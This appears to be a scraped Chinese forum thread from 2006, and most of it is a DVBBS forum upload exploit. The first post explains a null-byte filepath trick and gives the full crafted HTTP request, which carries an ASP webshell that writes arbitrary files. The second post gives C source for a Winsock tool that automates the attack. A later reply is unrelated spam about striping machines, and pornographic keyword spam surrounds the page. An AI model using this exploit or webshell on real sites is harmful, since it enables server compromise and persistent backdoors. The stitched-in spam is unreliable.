日本高清在线一区二区三区_精品一区二区三区无码视频_久久精品人人做人人爽老司机 _国产精品爆乳奶水无码视频_亚洲欧洲无码精品ⅤA_欧美人妻精品一区二区三区_精品人妻A∨一区二区夫上司犯_无码精品人妻一区二区三区漫画 _欧美高清VIVO最新

 通信界 | 通信圈 | 通信家 | 下載吧 | 說吧 | 國際 | 國內 | 運營 | 市場 | 財經 | 物聯網 | 無現金 | | 專網 | 信息安全 | 5G | BigDate
 電源 | 專網 | 光通信 | 交換 | 視頻 | 接入 | 無線 | 線纜 | 測試 | IT | 自動化 | 互聯網 | 數據 | 政策 | 終端 | NGN | 視界 | 前瞻 | 知本院

通信圈〖休閑 · 娛樂〗數據編程 · 大數據建設 → 動網論壇上傳文件漏洞的原理以及攻擊的代碼實現

歡迎您提出建議和意見!管理員QQ:181502650 通信界QQ群:群①:31498574;群②:89286709 下載吧-通信書籍、通信論文、通信報告集聚地! 通信界QQ群:群③:5834261;群④:8044407

  共有4864人關注過本帖樹形打印復制鏈接

主題:動網論壇上傳文件漏洞的原理以及攻擊的代碼實現
帥哥喲,離線,有人找我嗎?
新月彎刀
   1樓 | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發短信 新月派彎刀
等級:通信圈管理員 帖子:2213 積分:26874 威望:10 精華:34 注冊:2004/9/1 1:25:35 		動網論壇上傳文件漏洞的原理以及攻擊的代碼實現  發帖心情 Post By:2006/10/18 12:00:33 [只看該作者]

最近一段時間比較忙,沒什么時間為組織做貢獻(實在是沒實力,呵呵).剛好前一段時間聽小豬(豬蛋兒的《目前流行的BBS安全性比較》一文請參閱:http://wvw.ttian.net/forum/viewtopic.php?id=269)說動網論壇出了一個上傳任意文件的漏洞,當時沒怎么明白.但是我看到最近NB論壇上全部都在討論有關這方面的問題,就研究了一下,發現這個漏洞確實存在,而且非常嚴重,用小豬的話說是DVBBS7.0 SP2以下通殺.雖然有些人已經知道了攻擊方法,但是還是存在一些問題.下面我就動網的這個漏洞做一下講解.(不知道會不會被人罵,因為這個漏洞實在太大了). 我們先看一下動網論壇上傳文件的相關代碼: '===========無組件上傳(upload_0)==================== sub upload_0() set upload=new UpFile_Class ''建立上傳對象 upload.GetDate (int(Forum_Setting(56))*1024) '取得上傳數據,不限大小 iCount=0 if upload.err > 0 then select case upload.err case 1 Response.Write "請先選擇你要上傳的文件 [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" case 2 Response.Write "圖片大小超過了限制 "&Forum_Setting(56)&"K [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" end select exit sub else formPath=upload.form("filepath") ''在目錄后加(/) if right(formPath,1)<>"/" then formPath=formPath&"/" for each formName in upload.file ''列出所有上傳了的文件 set file=upload.file(formName) ''生成一個文件對象 if file.filesize<100 then response.write "請先選擇你要上傳的圖片 [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" response.end end if fileExt=lcase(file.FileExt) if CheckFileExt(fileEXT)=false then response.write "文件格式不正確 [ <a href=# onclick=history.go(-1)>重新上傳</a> ]" response.end end if randomize ranNum=int(90000*rnd)+10000 filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt if file.FileSize>0 then ''如果 FileSize > 0 說明有文件數據 file.SaveToFile Server.mappath(filename) ''保存文件 ' response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!<br>" response.write "<script>parent.document.forms[0].myface.value='"&FileName&"'</script>" iCount=iCount+1 end if set file=nothing next set upload=nothing session("upface")="done" Htmend iCount&" 個文件上傳結束!" end if end sub 在上面代碼中可以看到這樣一句: filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt 這里,filename是保存的文件名,它是依照上傳時間來命名的,最后擴展名是表單中提交過來的文件的擴展名.但是程序中對提交文件的類型做了限制,顯然想直接上傳ASP文件是不可行的.但是我們來看一下做為后輟的依據從哪里來的呢?我們可以在reg_upload.asp中找到這樣的代碼: <form name="form" method="post" action="upfile.asp" enctype="multipart/form-data" > <input type="hidden" name="filepath" value="uploadFace"> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="hidden" name="fname"> <input type="submit" name="Submit" value="上傳" onclick="fname.value=file1.value,parent.document.forms[0].Submit.disabled=true, parent.document.forms[0].Submit2.disabled=true;"> </form> 這樣,我們知道了,程序是提取file1表單和fname表單中的值來做判斷的.也就是說直接從頁面遞交我們的ASP文件也是行不通了,但是,如果是我們自己構造數據包的話就不一樣了.欲望之翼提出的方法就是自已構造數據包來達到欺騙的目的.將提交的file1表單和fname表單項的值改成合法的文件名稱.這樣就可以繞過文件類型的檢測了. 當然,主要的問題不在這里,如果我們只是要上傳那些代碼的話,我們完全可以直接改文件名就好了.我們的目的是要讓我們上傳的文件名改成ASP,這樣我們才可以利用.關鍵就在這一句了: formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt 這句話將一段字符串合并起來.我們能改的就是formPath這個參數.在計算機中檢測字符串的關鍵就是看是否碰到'\0'字符,如果是,則認為字符串結束了.也就是說我們在構造上傳文件保存路徑時,只要欺騙計算機,讓他認為類似"uploadface\zwell.asp"這樣的路徑參數已經結束了,這樣,后面一連串的時間字符我們都可以不要,從而達到直接將文件保存為我們定義的文件名的目的.因些,我們要做的是在構造的數據包中,將表單中的filepath改成類似uploadface\zwell.asp'\0'的字符串然后發送出去就行了. 我們先來看一下數據包的格式(論壇上好像大家用的是WSockExpert,不過我用的是IRIS,我覺得更專業一點,^_^): POST /forum/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: uyee.com Content-Length: 1593 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF -----------------------------7d4a325500d2 Content-Disposition: form-data; name="filepath" uploadFace\zwell.asp -----------------------------7d4a325500d2 Content-Disposition: form-data; name="act" upload -----------------------------7d4a325500d2 Content-Disposition: form-data; name="file1"; filename="C:\1.gif" Content-Type: text/plain <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%> <%if Trim(request("syfdpath"))<>"" then%> <%fdata = request("cyfddata")%> <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%> <%objCountFile.Write fdata%> <%if err =0 then%> <%response.write "<font color=red>save Success!</font>"%> <%else%> <%response.write "<font color=red>Save UnSuccess!</font>"%> <%end if%> <%err.clear%> <%end if%> <%objCountFile.Close%> <%Set objCountFile=Nothing%> <%Set objFSO = Nothing%> <%Response.write "<form action='''' method=post>"%> <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%> <%Response.Write "<br>"%> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%> <%Response.write "<br>"%> <%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%> <%Response.write "<input type=submit value=save>"%> <%Response.write "</form>"%> -----------------------------7d4a325500d2 Content-Disposition: form-data; name="fname" C:\1.gif -----------------------------7d4a325500d2 Content-Disposition: form-data; name="Submit" 上傳 -----------------------------7d4a325500d2-- 上面的數據我是在WIN2003下調試的.按我前面講的,只要改幾個地方就好了 1.Content-Disposition: form-data; name="file1"; filename="C:\1.gif" 2.Content-Disposition: form-data; name="fname" C:\1.gif 3.最重要的地方:uploadFace\zwell.asp,怎么加一個空字符呢?用UltraEdit是個好方法,用16進制編輯,(因為'\0'這個字符也占一個位置,所以我們先打入一空格,然后再在UltraEdit里將對就空格符的20改成00). 至于,最前面的那一段,直接從抓包工具中提取就是了.而且隨便一個都行.但是最重要的是要注意這一句: Content-Length: 1593 很多人測試都沒成功,就因為這個值設的不對,其實這個值很好算,是從第一個"-----------------------------7d4a325500d2"開始算起,到"-----------------------------7d4a325500d2--\r\n\r\n"截止,大家看到的"\r\n"是起換行作用,占兩個字符.我看論壇上大家論壇時都是說加一個字符值就加一,不是說不對,只是還要這樣數,代碼短倒無所謂,代碼要是很長怎么辦呢?:),這里告訴大家一個簡單的方法:打開記事本,將算長度的代碼復制到記事本,保存,然后看屬性就一目了然了,一個字符都不會錯.只是有一點必須注意,必須將最后的那幾個換行也復制進來.很多人就是因為沒有復制換行才失敗的.


由于家園論壇數據量過于龐大,無法進行帖子逐個修改,故給所有用戶每人增加5000元電通幣用于下載用,若電通幣用完了,可以向管理員申請,版主會及時給您增加金錢,也希望大家理解,多多發貼跟帖,共同營造良好的溝通氛圍。
下載吧-通信書籍、通信論文、通信報告集聚地!  回到頂部
帥哥喲,離線,有人找我嗎?
新月彎刀
   2樓 | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發短信 新月派彎刀
等級:通信圈管理員 帖子:2213 積分:26874 威望:10 精華:34 注冊:2004/9/1 1:25:35 		  發帖心情 Post By:2006/10/18 12:00:52 [只看該作者]

寫了這么多,我們也看到,每一個這樣改太不方便,做了工具是必須的了,呵呵,具體不多說了,部分代碼如下: #include <winsock2.h> #include <stdio.h> #include "Resource.h" #pragma comment(lib,"ws2_32.lib") HINSTANCE g_hInst; HWND g_hWnd; HWND m_up; HWND m_host; HWND m_webpath; HWND m_path; HWND m_filename; HWND m_upload; DWORD m_theadid; BYTE sendbuf[10000]; char host[80]; //主機地址 char bbspath[50]; //論壇地址 char uppath[20]; //上傳目錄 char upfilename[50]; //上傳文件名 char upfiledata[8000]; //上傳文件內容 int sendsize; //總傳送數據大小 int realsndsize = 0; //傳送頁面文件的大小 char snddata[8000]; char mm[1000]= "<%dim objFSO%>\r\n" "<%dim fdata%>\r\n" "<%dim objCountFile%>\r\n" "<%on error resume next%>\r\n" "<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n" "<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n" "<%fdata = request(\"cyfddata\")%>\r\n" "<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n" "<%objCountFile.Write fdata%>\r\n" "<%if err =0 then%>\r\n" "<%response.write \"<font color=red>save Success!</font>\"%>\r\n" "<%else%>" "<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n" "<%end if%>\r\n" "<%err.clear%>\r\n" "<%end if%>" "<%objCountFile.Close%>\r\n" "<%Set objCountFile=Nothing%>\r\n" "<%Set objFSO = Nothing%>" "<%Response.write \"<form action=\'\' method=post>\"%>\r\n" "<%Response.Write \"<input type=text name=syfdpath width=32 size=50>\"%>\r\n" "<%Response.Write \"<br>\"%>\r\n" "<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n" "<%Response.write \"<br>\"%>\r\n" "<%Response.write \"<textarea name=cyfddata cols=80 rows=10 width=32></textarea>\"%>\r\n" "<%Response.write \"<input type=submit value=save>\"%>\r\n" "<%Response.write \"</form>\"%>\r\n"; //獲得控件文本 char *gettext(HWND chwnd) { char tmpbuf[10000]; SendMessage(chwnd, WM_GETTEXT, (WPARAM)sizeof(tmpbuf), (LPARAM)tmpbuf); return tmpbuf; } //設置控件文本 void settext(HWND chwnd,char *text) { SendMessage(chwnd, WM_SETTEXT, (WPARAM)(0), (LPARAM)text); } char *itos(int data) { char tmp[10]; sprintf(tmp, "%d", data); return tmp; } //上傳線程 DWORD WINAPI uploadthread(LPVOID param) { SOCKET s; sockaddr_in sin; struct hostent * hp; unsigned int addr; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); ZeroMemory((void *)&sin, sizeof(sin)); hp = gethostbyname(gettext(m_host)); if (!hp) addr = inet_addr(gettext(m_host)); if ((!hp) && (addr == INADDR_NONE) ) { MessageBox(g_hWnd, "Unable to resolve host", "sendbuf", MB_OK); return 0; } if (hp != NULL) memcpy(&(sin.sin_addr),hp->h_addr,hp->h_length); else sin.sin_addr.s_addr = addr; sin.sin_port = htons(80); sin.sin_family = AF_INET; strcpy(host, gettext(m_host)); strcpy(bbspath, gettext(m_webpath)); strcpy(upfiledata, gettext(m_upload)); strcpy(uppath, gettext(m_path)); strcpy(upfilename, gettext(m_filename)); realsndsize = 578 + strlen(uppath) + strlen(upfilename) + strlen(upfiledata) + 1; sprintf((char *)sendbuf, "POST %s/upfile.asp HTTP/1.1\r\n" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" "Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp\r\n" "Accept-Language: zh-cn\r\n" "Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2\r\n" "Accept-Encoding: gzip, deflate\r\n" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n" "Host: %s\r\n" "Content-Length: %d\r\n" "Connection: Keep-Alive\r\n" "Cache-Control: no-cache\r\n" "Cookie: iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF\r\n\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"filepath\"\r\n\r\n" "%s\\%s", bbspath, host, realsndsize, uppath, upfilename); sendsize = strlen((char *)sendbuf); sendbuf[sendsize] = '\0'; sprintf(snddata, "\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"act\"\r\n\r\n" "upload\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"file1\"; filename=\"C:\\1.gif\"\r\n" "Content-Type: text/plain\r\n\r\n" "%s\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"fname\"\r\n\r\n" "C:\\1.gif\r\n" "-----------------------------7d4a325500d2\r\n" "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n" "上傳\r\n" "-----------------------------7d4a325500d2--\r\n\r\n", upfiledata); strcat((char *)&sendbuf[sendsize+1], snddata); sendsize += strlen(snddata); sendsize += 1; if(SOCKET_ERROR == connect(s, (struct sockaddr *)&sin, sizeof(sin))) { MessageBox(g_hWnd, "連接出錯!", "出錯提示:", MB_OK|MB_IConERROR); return 0; } int sendsz = send(s, (char *)sendbuf, sendsize, 0); if(sendsz <= 0) MessageBox(g_hWnd, "發送數據失敗", itos(WSAGetLastError()), MB_OK); char recvbuf[10000]; recv(s, (char*)recvbuf, 10000, 0); settext(m_upload, recvbuf); closesocket(s); return 0; } void WINAPI On_Command(WPARAM wParam) { switch (LOWORD(wParam)) { case ID_UP: CreateThread(NULL, 0, uploadthread, NULL, NULL, &m_theadid); break; case IDCANCEL: SendMessage(g_hWnd, WM_CLOSE, (WPARAM)(NULL), LPARAM(NULL)); break; } } static BOOL CALLBACK MainDlgProc(HWND hWndDlg, UINT msg, WPARAM wParam, LPARAM lParam) { switch (msg) { case WM_INITDIALOG: g_hWnd = hWndDlg; m_up = GetDlgItem(g_hWnd, ID_UP); m_host = GetDlgItem(g_hWnd, IDC_EDIT1); m_webpath = GetDlgItem(g_hWnd, IDC_EDIT2); m_path = GetDlgItem(g_hWnd, IDC_EDIT3); m_upload = GetDlgItem(g_hWnd, IDC_EDIT4); m_filename = GetDlgItem(g_hWnd, IDC_EDIT5); settext(m_host, "192.168.10.101"); settext(m_webpath, "/"); settext(m_path, "uploadface"); settext(m_filename, "zwell.asp"); settext(m_upload, mm); return TRUE; case WM_COMMAND: On_Command(wParam); break; case WM_SIZE: break; case WM_CLOSE: EndDialog(g_hWnd,0); break; } return FALSE; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { WSADATA wsaData; g_hInst=hInstance; if(WSAStartup(MAKEWORD(1, 1), &wsaData)) { MessageBox(NULL,"無法初始化 Winsock DLL\t","錯誤",MB_OK|MB_ICONSTOP); return 0; } DialogBox(g_hInst, MAKEINTRESOURCE(IDD_DIALOG1), NULL, (DLGPROC) MainDlgProc); WSACleanup(); return 1; }


由于家園論壇數據量過于龐大,無法進行帖子逐個修改,故給所有用戶每人增加5000元電通幣用于下載用,若電通幣用完了,可以向管理員申請,版主會及時給您增加金錢,也希望大家理解,多多發貼跟帖,共同營造良好的溝通氛圍。
下載吧-通信書籍、通信論文、通信報告集聚地!  回到頂部
帥哥喲,離線,有人找我嗎?
山雨夜來漲
   3樓 | QQ | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發短信
等級:副組長 帖子:35 積分:219 威望:0 精華:0 注冊:2010/12/6 23:40:42 		are generally used by companies  發帖心情 Post By:2010/12/27 17:53:12 [只看該作者]

Striping machines are used to paint lines on a variety of surfaces. They are commonly used on pavement to mark parking lots, roads and airports as well as on grass or dirt for sports fields. Striping machines basically consist of a small engine, an air compressor, the spray nozzle and a series of valves and hoses including one for paint intake. There is frequently a hose ranging from 25 to 50 feet on average that is attached to a separate spray gun similar to the kind found in spray painting equipment that is used for stencils or touch ups. Wheels, a handle and a trigger allow the operator to control the direction of the machine and the force of the paint spray. Most striping machines are pushed by the operator because that increases the amount of control and precision the operator has; self-propelled striping machines or ride-on striping machines are available for large areas. The frame is made from metal and is typically heavy duty stainless steel to resist harsh solvents and corrosion. Some models of striping machines have dashboards that light up for nighttime use. Centralized controls, filters, hose wraps and other accessories help facilitate high productivity for a fast and clean job. Striping machines are generally used by companies that specialize in laying asphalt, sealing cracks and other pavement issues rather than businesses that have paint machines or systems.


www.temsoo.com
通信界QQ群:群③:5834261;群④:8044407  回到頂部
AV无码免费岛国动作片片段欣赏| 亚洲欧洲日产国码AⅤ| 亚洲精品无码寂寞少妇AV| 中文字幕亚洲人妻| 隔着超薄肉丝袜做AV在线| 精品久久久久久天美传媒| 欧美人与性囗牲恔配视频| 无码热综合无码色综合| 又大又长粗又爽又黄少妇视频| 成人无码视频97免费| 精品久久久久久综合日本| 人妻少妇看A偷人无码| 少妇熟女视频一区二区三区| 人人爽人人澡人人高潮| 久久久久精品电影一区二区三区 | 差差差很疼APP大全免费下载软| 国产免费人成在线视频| 妺妺窝人体色WWW聚色窝丿| 无码AV大香线蕉| 中文字日产幕码三区的做法步骤| 国产精品久久久久电影院| 邻居少妇张开双腿让我爽一夜 | 亚洲乱妇熟女爽到高潮 | 人妻聚色窝窝人体WWW一区| 亚洲成A人片在线观看你懂的| 爸爸10岁幼儿TREE小学生| XXXXXL日本17上线| 日韩精品少妇无码受不了| 脱了老师内裤猛烈进入的软件| 岳今晚让我玩个够肥水一体探岳体 | 激情内射亚洲一区二区三区爱妻| 欧美肉欲XXⅩOOOHD| 亚洲国产精品久久久天堂不卡海量 | 又大又硬又粗再深一点| 第一夜被弄得又红又肿| 看国产黄大片在线观看| 小浪货腿张开水好多呀H| 欧美亚洲国产片在线播放| 日本亚洲色大成网站www久久| 妺妺自愿做我的性玩具| 含羞草实验室隐藏路径2023 | 免费看30分钟打扑克教程| 老司机久久一区二区三区| 亚洲AV成人片色在线高潮| 99久久精品国产一区二区三区 | 亚洲ΑV无码一区二区三区四区| WWW国产亚洲精品久久麻豆| 狠狠色噜噜狠狠狠8888在| 日日玩日日摸日日上| 中国女人大白屁股ASS| 国产在线超清日本一本| 肉丝超薄丝袜交一区二区| 18禁止免费观看试看免费大片| 国精产品一线二线三线| 毛豆日产精品卡2卡3卡4卡免费| 欧美成人区精品一区二区婷婷| 女人18毛片水真多免费看| 人人插人人操人人射av网| 亚洲综合无码一区二区三区| 国产精品无码一区二区三区免费| 秋霞免费理论片在线观看| 樱花YY私人在线影院| 国外免费B2B网站| 婷婷色婷婷开心五月四房播播| 啊~CAO死你个小SAO货视频| 老赵抱着媛媛在厨房做| 亚洲国产一区二区三区在线观看 | 国产蜜桃AV秘 区一区二区三区| 日本不卡高清兔费V| 2021国产手机在线精品| 久久精品久久精品中文字幕| 亚洲AV乱码久久精品密桃| 国产SUV精品一区二区69| 日本高清视频www| A级毛片高清免费视频在线播放| 久久强奷乱码老熟女| 久久精品人人爽人人爽| 午夜成人鲁丝片午夜精品 | ぱらだいす天堂官网链接| 久久国产自偷自偷免费一区调| 小SAO货CAO得你舒服么| 国产成人综合欧美精品久久| 日韩内射美女片在线观看网站| JAPANESE中国丰满少妇| 女人扒下裤让男人桶到爽| 稚嫩的花苞被老师开了| 久久天天躁夜夜躁狠狠躁2014| 亚洲色欲色欲大片WWW无码| 狠狠干2015最新版| 性一交一乱一伦一色一情孩交| 国产爱豆剧传媒在线观看视频| 色噜噜狠狠狠狠色综合久一| 草莓视频CAOMEI888| 人人玩人人添人人澡| 把腿张开老子cao烂你n视频| 人妻丰满AV中文久久不卡| YY6080久久亚洲精品| 让人一看就舒服的网名| WWWW亚洲熟妇久久久久| 人妻AV鲁丝一区二区三区蜜臀| あざらしそふと官网| 人妻中文乱码在线网站| 成人免费无码AV| 色综合伊人色综合网站| 国产成人精品午夜福利APP色多| 天天摸天天做天天爽| 国产寡妇XXXX猛交| 午夜精品久久久久久中宇| 国产女人被狂躁到高潮小说 | 伊人色综合网一区二区三区| 久久精品中文騷妇女内射| 一区二区三区高清AV专区| 老牛aV无码一区二区人妻| 最新 国产 精品 精品 视频| 欧美V亚洲V综合Ⅴ国产V | 拍摄AV现场失控高潮数次| А√天堂资源中文在线官网| 日本适合十八岁以上的护肤品一 | 99久久国产自偷自偷免费一区 | AV无码精品久久久久精品免费| 欧洲吸奶大片在线看| 成人免费无码H在线观看不卡| 十八款夜间禁用APP| 国产免费无码一区二区视频| 亚洲AⅤ天堂AV天堂无码麻豆| 精品久久8X国产免费观看| 一本到在线高清视频| 女人被弄到高潮叫床免| 边做饭边被躁BD小说| 天堂8在/线中文在线资源8| 国产未成满18禁止免费看| 亚洲人成人无码www五月婷| 美女裸体十八禁免费网站| 999在线视频精品免费播放观看 | 别揉我奶头~嗯~啊~视频| 少妇搡BBBB搡| 黑料吃瓜网998.SU永久有效 | 餐桌下手指噗呲噗呲| 婷婷综合另类小说色区 | 亚洲AV中文无码乱人伦在线R▽| 久久久久久亚洲AV无码蜜芽| 99久久夜色精品国产网站| 日日摸夜夜添夜夜添AV| 国产亚洲美女精品久久久2020 | 无码中文字幕AV久久专区| 精品一区二区三区影院在线午夜| 2021国产精品国产精华| 色婷婷色综合激情国产日韩| 国产在线观看无码免费视频 | 男女做高潮120秒试看| 成年午夜免费AⅤ在线观看| 香港三香港日本三级在线理论| 久久精品A亚洲国产V高清不卡 | 欧洲肉欲K8播放毛片| 国产国产精品人在线观看| 亚洲日韩精品无码专区加勒比海| 欧美激情性XXXXX高清真| 国产好大好硬好爽免费不卡 | 亚洲不卡无码AV中文字幕| 免费国产黄网站在线观看视频| 丁香花在线观看免费高清版| 亚洲精品国产美女久久久99| 女人与牛ZOZO| 国产毛片一二区三区四区| 又色又爽又黄的视频APP软件下| 日韩AV蜜桃在线观看| 黑人巨茎大战白人女40CM| 91精品人妻一区二区三区蜜桃| 挽起裙子迈开腿坐下去的图片高清| 久久99国产精品片久久99蜜桃| а天堂中文在线官网| 亚洲AV素人乱码| 欧美巨大XXXX做受中文字幕| 国产成在线观看免费视频成本人| 夜夜精品无码一区二区三区| 日韩人妻无码一区二区三区综合 | 欧美精品xxxxx| 国产农村妇女毛片精品久久麻豆| 中国人妻XXXXX免费看| 铜铜铜铜铜铜铜铜好大好深色星空| 久久无码人妻一区二区三区午夜 | 79年熟女大胆露脸啪啪对白P| 翁止熄痒苏钥第9章的内容| 毛片免费视频在线观看| 国产好爽…又高潮了毛片| 中国熟妇色XXXXX中国老妇| 玩乡下黄花小处雏女| 女女互揉吃奶揉到高潮视频 | 亚洲AV无码成人网站久久精品大| 女少18XⅩXX性XXXXHD| 国产亚洲大尺度无码无码专线 | 极品少妇XXXX精品少妇小说| Z0ZOZ0另类Z0ZO| 亚洲欧美日韩精品久久亚洲区| 日韩精品人妻无码久久影院| 久久久精品波多野结衣| 国产SM残忍打屁股调教视频| 2021av在线视频| 亚洲精品亚洲人成在线| 少女たちよ在线观看动漫4集免费 少女たちよ在线观看动漫4 |